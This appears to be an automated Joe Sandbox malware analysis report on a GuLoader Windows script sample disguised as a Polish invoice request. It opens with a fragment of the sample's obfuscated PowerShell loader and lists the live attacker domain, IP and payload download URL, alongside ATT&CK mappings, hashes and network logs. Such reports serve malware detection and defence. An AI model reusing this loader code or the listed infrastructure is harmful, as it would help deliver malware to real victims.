:.wfulle/.rocaic/PuppetlsJacalsii F,rulylHepht eiMaaleren epersoau,creatsLicentitConnuan.KontrrernontyphoPondero/ UnguicJ,ongfeluDyrtidsgAfgrelslThro,doa niformn charondPrefectiTv,ngsinEksdik..Kin.redxType odtkristanpInd ull ';$Terroristens=Citationstegnet 'eft rml>Deseca ';$Kaste=Citationstegnet 'U derviicephaloeLaiciziX Perfor 
';$Halibuts='Layland';$Darlenes='\Kassestrimmelens.Aft';Humiria (Citationstegnet 'Heft,gt$SkridtbGCrotonil KrystaOAbstracBpurdasiAUdsor el N,nges:Udsag kA .anthodRefas,emUncharii SuppleNPostsaci ewspapsGenvlgetD,ekcyaRNonunciA Hulds T IlliciiKvittero MorfinNEpilogisPreentepDrun,enrCus ekdOTvetandGtrkgardrLitera ABeijingM ic.orsmAlarmereSthammerInd fry=Undersk$Sur,useeSeweragNMllerenVTa kats:UndightACentralpdristerPF cellid StorstAEgomanit Sku spAMe,meri+ Pander$LinguovDKlvandkaBelliferGinglymLCumsha,EAlmennyN VarmlueBrugsmsSAnorect ');Humiria (Citationstegnet 'Viziera$AdemonigPr teifLArbejdeoVan fribMixologaAfkodnilUnderme:RegnefuUaksiomaPIncongeS Fo beheScorevatHypos rTEncr,ptaKonversl Opmarc=Economb$TrimolemOpstaada VegetaaUvrdigtlEnsurege Vo dgiS EngberT redsaAImp,ritT ArvelsiPekingeO Inthron andsynEDemoniaRAffaldsNSympatiEOverlegsFastlaa.H.vregrSSandslopBestriplMisogynimycelietoverjoy(Hagge,e$ Af,tantUnarcheeSilikatrB sgader,hasiluoFremholRDgn.rveIMiscoloS.pildolTPo letreIsocampN SubsidsBlodser)Strepto ');Humiria (Citationstegnet 'ContralJump to behavior
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677e
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | 22 Scripting | Valid Accounts | 2 Command and Scripting Interpreter | 22 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
      Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 12 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
      Source | Detection | Scanner | Label
      Wniosek o numer faktury.wsf | 24% | ReversingLabs | Script-WScript.Trojan.GuLoader
      Wniosek o numer faktury.wsf | 19% | Virustotal |

      No Antivirus matches
      No Antivirus matches

      Source | Detection | Scanner | Label
      silinast.ro | 10% | Virustotal |

      Source | Detection | Scanner | Label
      http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
      http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
      https://contoso.com/ | 0% | URL Reputation | safe
      https://nuget.org/nuget.exe | 0% | URL Reputation | safe
      https://contoso.com/License | 0% | URL Reputation | safe
      https://contoso.com/Icon | 0% | URL Reputation | safe
      https://aka.ms/pscore68 | 0% | URL Reputation | safe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
      http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal |
      http://silinast.ro | 10% | Virustotal |
      https://github.com/Pester/Pester | 1% | Virustotal |
      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      silinast.ro | 188.241.183.45 | true | false | | unknown
      6777.6777.6777.677e | unknown | unknown | true | | unknown

      Name | Malicious | Antivirus Detection | Reputation
      http://silinast.ro/Juglandin.xtp | true | | unknown
          Name | Source | Malicious | Antivirus Detection | Reputation
          http://silinast.ro | powershell.exe | true | | unknown
          http://nuget.org/NuGet.exe | powershell.exe | false | URL Reputation: safe | unknown
          http://silinast.ro( | powershell.exe | true | | unknown
          http://pesterbdd.com/images/Pester.png | powershell.exe | false | URL Reputation: safe | unknown
          http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe | false | | unknown
          http://silinast.ro/Juglandin.xtpP | powershell.exe | true | | unknown
          https://contoso.com/ | powershell.exe | false | URL Reputation: safe | unknown
          https://nuget.org/nuget.exe | powershell.exe | false | URL Reputation: safe | unknown
          https://contoso.com/License | powershell.exe | false | URL Reputation: safe | unknown
          https://contoso.com/Icon | powershell.exe | false | URL Reputation: safe | unknown
          https://aka.ms/pscore68 | powershell.exe | false | URL Reputation: safe | unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe | false | URL Reputation: safe | unknown
          https://github.com/Pester/Pester | powershell.exe | false | | unknown
              IP | Domain | Country | ASN | ASN Name | Malicious
              188.241.183.45 | silinast.ro | Romania | 5588 | GTSCEGTSCentralEuropeAntelGermanyCZ | false
              Joe Sandbox version: 41.0.0 Charoite
              Analysis ID: 1528870
              Start date and time: 2024-10-08 11:00:54 +02:00
              Joe Sandbox product: CloudBasic
              Overall analysis duration: 0h 6m 34s
              Hypervisor based Inspection enabled: false
              Report type: full
              Cookbook file name: default.jbs
              Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed: 24
              Number of new started drivers analysed: 0
              Number of existing processes analysed: 0
              Number of existing drivers analysed: 0
              Number of injected processes analysed: 0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode: default
              Analysis stop reason: Timeout
              Sample name: Wniosek o numer faktury.wsf
              Detection: MAL
              Classification: mal96.troj.expl.evad.winWSF@9/3@2/1
              EGA Information: Failed
              HCA Information:
              • Successful, ratio: 83%
              • Number of executed functions: 6
              • Number of non-executed functions: 2
              Cookbook Comments:
              • Found application associated with file extension: .wsf
              • Override analysis time to 240s for powershell
              • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
              • Excluded IPs from analysis (whitelisted): 20.223.36.55, 20.223.35.26, 20.103.156.88, 20.31.169.57
              • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com, iris-de-prod-azsc-v2-weu.westeurope.cloudapp.azure.com, ocsp.digicert.com, iris-de-prod-azsc-v2-weu-b.westeurope.cloudapp.azure.com, arc.trafficmanager.net, www.msftconnecttest.com, iris-de-prod-azsc-v2-neu-b.northeurope.cloudapp.azure.com, iris-de-prod-azsc-v2-neu.northeurope.cloudapp.azure.com
              • Execution Graph export aborted for target powershell.exe, PID 1336 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              Time | Type | Description
              05:01:49 | API Interceptor | 11575697x Sleep call for process: powershell.exe modified
              Match | Associated Sample Name / URL | Detection | Threat Name | Context
              188.241.183.45 | Prosba o oferte.wsf | malicious | GuLoader | silinast.ro/Kommunikuternes.inf
              188.241.183.45 | g 288322.vbs | malicious | GuLoader | silinast.ro/Loveman232.msi

              Match | Associated Sample Name / URL | Detection | Threat Name | Context
              silinast.ro | Prosba o oferte.wsf | malicious | GuLoader | 188.241.183.45
              silinast.ro | g 288322.vbs | malicious | GuLoader | 188.241.183.45
              silinast.ro | Cerere oferta S.C. SHIPYARD ATG GIURGIU S.R.L..vbs | malicious | GuLoader | 188.241.183.45

              Match | Associated Sample Name / URL | Detection | Threat Name | Context
              GTSCEGTSCentralEuropeAntelGermanyCZ | Prosba o oferte.wsf | malicious | GuLoader | 188.241.183.45
              GTSCEGTSCentralEuropeAntelGermanyCZ | ZAMOWIEN.EXE.exe | malicious | AgentTesla, GuLoader | 185.146.87.128
              GTSCEGTSCentralEuropeAntelGermanyCZ | na.elf | malicious | Unknown | 94.42.225.21
              GTSCEGTSCentralEuropeAntelGermanyCZ | https://alquimista.hosted.phplist.com/lists/lt.php?tid=cE0FU1AHDgIFBx4AXQpVFAZXX18ZAwJTUx9QXA8AVFIMCQAEUVZKAFQHUVFfBFYUCloJBRlWDQ1SH15cAl1MUAFUAwIDUgNQUFlSHQxTUg1XUF9VGVIHVgUfUlgOUUxZXAZSGFMFDwxZBFdUWAEDAA | malicious | Unknown | 188.241.222.249
              GTSCEGTSCentralEuropeAntelGermanyCZ | ZAMOWIEN.EXE.exe | malicious | AgentTesla, GuLoader | 185.146.87.128
              GTSCEGTSCentralEuropeAntelGermanyCZ | g 288322.vbs | malicious | GuLoader | 188.241.183.45
              GTSCEGTSCentralEuropeAntelGermanyCZ | na.elf | malicious | Mirai | 94.42.225.83
              GTSCEGTSCentralEuropeAntelGermanyCZ | na.elf | malicious | Mirai | 62.168.37.193
              GTSCEGTSCentralEuropeAntelGermanyCZ | na.elf | malicious | Mirai | 94.42.225.84
              GTSCEGTSCentralEuropeAntelGermanyCZ | na.elf | malicious | Mirai | 94.42.225.74

              No context
              No context
              Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type: data
              Category: modified
              Size (bytes): 11608
              Entropy (8bit): 4.890472898059848
              Encrypted: false
              SSDEEP: 192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
              MD5: 8A4B02D8A977CB929C05D4BC2942C5A9
              SHA1: F9A6426CAF2E8C64202E86B07F1A461056626BEA
              SHA-256: 624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
              SHA-512: 38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
              Malicious: false
              Reputation: moderate, very likely benign file
              Preview: PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

              Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type: ASCII text, with no line terminators
              Category: dropped
              Size (bytes): 60
              Entropy (8bit): 4.038920595031593
              Encrypted: false
              SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5: D17FE0A3F47BE24A6453E9EF58C94641
              SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious: false
              Reputation: high, very likely benign file
              Preview: # PowerShell test file to determine AppLocker lockdown mode

              Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type: ASCII text, with no line terminators
              Category: dropped
              Size (bytes): 60
              Entropy (8bit): 4.038920595031593
              Encrypted: false
              SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5: D17FE0A3F47BE24A6453E9EF58C94641
              SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious: false
              Preview: # PowerShell test file to determine AppLocker lockdown mode

              File type: XML 1.0 document, ASCII text, with CRLF line terminators
              Entropy (8bit): 5.21854109830718
              TrID:
              • Visual Basic Script (13500/0) 72.95%
              • Generic XML (ASCII) (5005/1) 27.05%
              File name: Wniosek o numer faktury.wsf
              File size: 15'275 bytes
              MD5: b3a1adc2eab232bddfe5149b896af1c8
              SHA1: be84a3bb6abe9b87cd90af27ca5574dae9607d48
              SHA256: 55d2f245a0b7975884b7e5bbf284bcb72cc1514a726eb6988a1ca1e1e429cfb4
              SHA512: 0e89f571ad6380cb2be315474da159b0bd7c76fe4a170ef6a0fdaf67d3cefcd156500fb87df21adfb4bd0e28d5591a7faf50ea766d3329560e8783be4cf88f4d
              SSDEEP: 384:vvjOLjVGaVToUC5DX/FTZjkp6d+Ume68lh6x6orij59EUqAoWD7yQZ1Mm3IZLxVi:njOLjVGaVToUC5r/FTZwp6d+Ume68lh7
              TLSH: 82627F9485560F8D2E43237E2C126536CDF86A7E653F0C5C7A781F6C201AC9DAEB69CC
              File Content Preview: <?xml version="1.0" ?>..<job id="Objektiverendes">..<script ..language="VBScript">..' <![CDATA[..Private Const Helnodes = -21686..Private Const Lnnedgang = 1562..Private Const dekuprsave = 18205..Private Const Chondralgia = &HB29E..Private Const Gloomi
              Icon Hash: 68d69b8f86ab9a86
              Document Type: Text
              Number of OLE Files: 1
              Has Summary Info:
              Application Name:
              Encrypted Document: False
              Contains Word Document Stream: False
              Contains Workbook/Book Stream: False
              Contains PowerPoint Document Stream: False
              Contains Visio Document Stream: False
              Contains ObjectPool Stream: False
              Flash Objects Count: 0
              Contains VBA Macros: True
              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              Oct 8, 2024 11:02:07.544936895 CEST6220580192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:07.545013905 CEST6220580192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:07.550333023 CEST8062205188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:07.550771952 CEST8062205188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:11.596337080 CEST6220680192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:11.601259947 CEST8062206188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:11.601347923 CEST6220680192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:11.604522943 CEST6220680192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:11.606467009 CEST8062206188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:11.606528044 CEST6220680192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:11.608222961 CEST6220680192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:11.609339952 CEST8062206188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:11.611330986 CEST8062206188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:11.611423016 CEST6220780192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:11.612965107 CEST8062206188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:11.616313934 CEST8062207188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:11.616449118 CEST6220780192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:11.616449118 CEST6220780192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:11.621279955 CEST8062207188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:11.621573925 CEST8062207188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:15.761619091 CEST6220880192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:15.766746998 CEST8062208188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:15.766834021 CEST6220880192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:15.766910076 CEST6220880192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:15.771770000 CEST8062208188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:15.772231102 CEST8062208188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:15.772903919 CEST6220980192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:15.777811050 CEST8062209188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:15.781749010 CEST6220980192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:15.781862974 CEST6220980192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:15.786715031 CEST8062209188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:15.787034035 CEST8062209188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:19.811691999 CEST6221080192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:20.132648945 CEST8062210188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:20.132886887 CEST6221080192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:20.132886887 CEST6221080192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:20.137829065 CEST8062210188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:20.138044119 CEST8062210188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:20.139060974 CEST6221180192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:20.144026041 CEST8062211188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:20.144129992 CEST6221180192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:20.144181013 CEST6221180192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:20.149041891 CEST8062211188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:20.149252892 CEST8062211188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:24.150852919 CEST6221280192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:24.155932903 CEST8062212188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:24.156007051 CEST6221280192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:24.156074047 CEST6221280192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:24.160938978 CEST8062212188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:24.161248922 CEST8062212188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:24.161829948 CEST6221380192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:24.166747093 CEST8062213188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:24.166810989 CEST6221380192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:24.166860104 CEST6221380192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:24.171673059 CEST8062213188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:24.171969891 CEST8062213188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:28.199570894 CEST6221480192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:28.204550028 CEST8062214188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:28.204714060 CEST6221480192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:28.204714060 CEST6221480192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:28.209677935 CEST8062214188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:28.210231066 CEST8062214188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:28.211112976 CEST6221580192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:28.216001987 CEST8062215188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:28.216089010 CEST6221580192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:28.216144085 CEST6221580192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:28.221443892 CEST8062215188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:28.221874952 CEST8062215188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:32.229635000 CEST6223980192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:32.234421015 CEST8062239188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:32.238723040 CEST6223980192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:32.239213943 CEST6223980192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:32.243912935 CEST8062239188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:32.244096041 CEST8062239188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:32.244235039 CEST6223980192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:32.244313955 CEST6223980192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:32.244611025 CEST6224080192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:32.249192953 CEST8062239188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:32.249224901 CEST8062239188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:32.249404907 CEST8062240188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:32.249557018 CEST6224080192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:32.249557018 CEST6224080192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:32.254410028 CEST8062240188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:32.254642010 CEST8062240188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:36.323085070 CEST6224380192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:36.327923059 CEST8062243188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:36.328002930 CEST6224380192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:36.328084946 CEST6224380192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:36.332808971 CEST8062243188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:36.332948923 CEST8062243188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:36.333570004 CEST6224480192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:36.338406086 CEST8062244188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:36.338474035 CEST6224480192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:36.338532925 CEST6224480192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:36.343275070 CEST8062244188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:36.343614101 CEST8062244188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:40.338550091 CEST6224580192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:40.343415976 CEST8062245188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:40.343501091 CEST6224580192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:40.343605042 CEST6224580192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:40.348352909 CEST8062245188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:40.348598003 CEST8062245188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:40.349097013 CEST6224680192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:40.353929043 CEST8062246188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:40.354007006 CEST6224680192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:40.354054928 CEST6224680192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:40.358989000 CEST8062246188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:40.359141111 CEST8062246188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:44.411983013 CEST6224780192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:44.416841984 CEST8062247188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:44.416920900 CEST6224780192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:44.418354034 CEST6224780192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:44.422311068 CEST8062247188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:44.423110962 CEST8062247188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:44.423185110 CEST6224780192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:44.427947998 CEST6224780192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:44.428235054 CEST8062247188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:44.428394079 CEST6224880192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:44.433306932 CEST8062247188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:44.433445930 CEST8062248188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:44.433530092 CEST6224880192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:44.438704967 CEST8062248188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:44.438810110 CEST6224880192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:44.446125031 CEST6224880192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:44.446170092 CEST6224880192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:44.451024055 CEST8062248188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:44.451037884 CEST8062248188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:48.526375055 CEST6224980192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:48.951278925 CEST8062249188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:48.951683044 CEST6224980192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:48.951987982 CEST6224980192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:48.956856966 CEST8062249188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:48.957151890 CEST8062249188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:48.958527088 CEST6225080192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:48.963365078 CEST8062250188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:48.963906050 CEST6225080192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:48.964099884 CEST6225080192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:48.968873024 CEST8062250188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:48.968987942 CEST8062250188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:52.979830027 CEST6225180192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:53.156387091 CEST8062251188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:53.156481981 CEST6225180192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:53.156673908 CEST6225180192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:53.161386013 CEST8062251188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:53.161557913 CEST8062251188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:53.162610054 CEST6225280192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:53.167992115 CEST8062252188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:53.168087959 CEST6225280192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:53.173146963 CEST8062252188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:53.175096035 CEST6225280192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:53.193588972 CEST6225280192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:53.193711042 CEST6225280192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:53.198345900 CEST8062252188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:53.198407888 CEST8062252188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:57.198698997 CEST6225380192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:57.203797102 CEST8062253188.241.183.45192.168.2.6
